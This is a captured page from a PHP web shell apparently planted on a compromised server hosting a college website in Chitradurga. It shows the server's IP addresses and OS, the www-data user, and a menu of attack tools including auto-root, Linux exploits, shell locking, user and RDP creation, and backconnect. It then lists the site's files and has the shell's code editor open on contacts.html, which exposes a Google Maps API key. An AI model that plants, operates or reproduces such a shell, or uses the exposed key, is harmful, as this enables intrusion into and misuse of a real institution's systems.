Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.116.24.238
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
website /
gaccta /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
libs
[ DIR ]
drwxr-xr-x
picture_library
[ DIR ]
drwxr-xr-x
plesk-stat
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
test
[ DIR ]
drwxr-xr-x
aboutus.html
9.91
KB
-rwxr-xr-x
college.html
4.19
KB
-rwxr-xr-x
contacts.html
5.49
KB
-rwxr-xr-x
courses.html
11.54
KB
-rwxr-xr-x
exambr.html
5.34
KB
-rwxr-xr-x
favicon.ico
1.12
KB
-rwxr-xr-x
guest.html
17.77
KB
-rwxr-xr-x
index.html
8.66
KB
-rwxr-xr-x
index.php
282.81
KB
-rwxr-xr-x
mcverify.php
167
B
-rwxr-xr-x
studentsup.html
7.64
KB
-rwxr-xr-x
support.html
9.69
KB
-rwxr-xr-x
teaching.html
76.63
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : contacts.html
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8" /> <title>Government Arts College (Autonomous), Chitradurga </title> <link rel="shortcut icon" type="image/x-icon" href="../images/favicon.jpg" /> <link rel="stylesheet" href="css/style.css" type="text/css" media="all" /> <link rel="stylesheet" href="css/logstyle.css" type="text/css" media="all" /> <!-- Bootstrap Core CSS --> <link href="css/bootstrap.css" rel='stylesheet' type='text/css' /> <link href="css/animate.css" rel="stylesheet" type="text/css" media="all"> <script src="js/home.js" type="text/javascript"></script> <script src="js/jquery-1.7.2.min.js" type="text/javascript"></script> <script src="js/index.js" type="text/javascript"></script> <script src="js/control.js" type="text/javascript"></script> <script src="js/dytable.js" type="text/javascript"></script> <script src="js/validate.js" type="text/javascript"></script> <script src="js/form_submit.js" type="text/javascript"></script> <script src="js/loadtable.js" type="text/javascript"></script> <script src="js/cms.js" type="text/javascript"></script> </head> <body> <!-- wrapper --> <div id="wrapper"> <!-- shell --> <div class="shell"> <!-- container --> <div class="container"> <div style="margin-right:10px;padding-top:8px;color:#fff;" class="nav-top"> <span style="padding-left:5px;width:400px;" id="datestr"></span> <span style="float:right;padding-right:10px;"> <span id="user_name"></span> <span onclick="window.location.href='index.html'">Home</span> </span> </div <!-- header --> <header class="header"> <h1 style="width:1000px;" id="logo"><a href="#">Logisys</a></h1> <br style="clear:both;"/> <nav id="navigation"> <ul> <li class="active"><a href="index.html">Home</a></li> <li><a href="aboutus.html">About Us</a></li> <li><a href="courses.html">Courses Offered</a></li> <li><a href="#">Our Staff</a> <ul> <li><a href="teaching.html">Teaching Staff</a></li> <li><a href="support.html">Support Staff</a></li> <li><a href="guest.html">Guest Staff </a></li> </ul> </li> <li><a href="studentsup.html">Student Support</a></li> <!-- <li><a href="#">Students Corner</a> <ul> <li><a href="results.html">Results</a></li> <li><a href="exam.html">Examination Application Form </a></li> <li><a href="student.html">Online Services </a></li> <li><a href="degreecert.html">Degree Certificate</a></li> </ul> </li> <li><a href="#" onclick="redirectCollegepage()">College Login</a></li> <li><a href="teachers.html">Teachers Corner</a></li> --> <li><a href="contacts.html">Contact Us</a></li> <li><a href="exambr.html">Exam Branch</a></li> <li><a href="http://logisys.net.in/results/gcc">Results</a></li> </ul> </nav> <div class="cl"> </div> </header> <!-- end of header --> <div class="main"> <div id="v-nav" style="padding-top:5px;"> <div class="tab-content" style="display:block;margin-left:0px;"> <h4><b>Contact Us</b></h4> <div class="tab-content-body"> <p><h1> Principal</h1></p> <p><h5> Government College, Chitradurga </p></h5> <p><h5> PB Road, Chitradurga, Karnataka 577501</p></h5> <p><h5> Phone: 081942 35908</p></h5> <p><h5> email: controllergac@gmail.com</p></h5></br> <!--<div id="map" style="width:600px;height:300px;background:white"></div> <script> function myMap() { var mapOptions = { center: new google.maps.LatLng(17.322787, 76.852817), zoom: 8, mapTypeId: google.maps.MapTypeId.HYBRID HYBRID.setMap(map); } var map = new google.maps.Map(document.getElementById("map"), mapOptions); } </script> <script src="https://maps.googleapis.com/maps/api/js?key=AIzaSyABV6qj_1FZsvbR4lIZCEFIqAJPDvQV9Mk&callback=myMap"></script>--> <div id="map" style="width:600px;height:300px"></div> <script> function myMap() { var myCenter = new google.maps.LatLng(17.322787, 76.852817); var mapCanvas = document.getElementById("map"); var mapOptions = {center: myCenter, zoom: 10}; var map = new google.maps.Map(mapCanvas, mapOptions); var marker = new google.maps.Marker({position:myCenter}); marker.setMap(map); } </script> <script src="https://maps.googleapis.com/maps/api/js?key=AIzaSyABV6qj_1FZsvbR4lIZCEFIqAJPDvQV9Mk&callback=myMap"></script> <!-- <div id="map" style="width:500px;height:500px"></div> <script> function myMap() { var mapCanvas = document.getElementById("map"); var mapOptions = { center: new google.maps.LatLng(17.322787, 76.852817), zoom:18, mapTypeId:google.maps.MapTypeId.HYBRID }; var map = new google.maps.Map(mapCanvas,mapOptions); } </script> <script src="https://maps.googleapis.com/maps/api/js?key=AIzaSyABV6qj_1FZsvbR4lIZCEFIqAJPDvQV9Mk&callback=myMap"></script>--> <!-- <!-- </div> </div> <!-- end of box --> </div> </div> <!-- end of main --> <section style="background: url(images/appfromHd.jpg) repeat 0 0;"></section> <!-- end of container --> </div> <!-- end of shell --> </div> </div> </div> <!-- end of wrappert --> <script src="js/script.js"></script> <script type="text/javascript" src="js/bootstrap.min.js"></script> </body> </html>
Close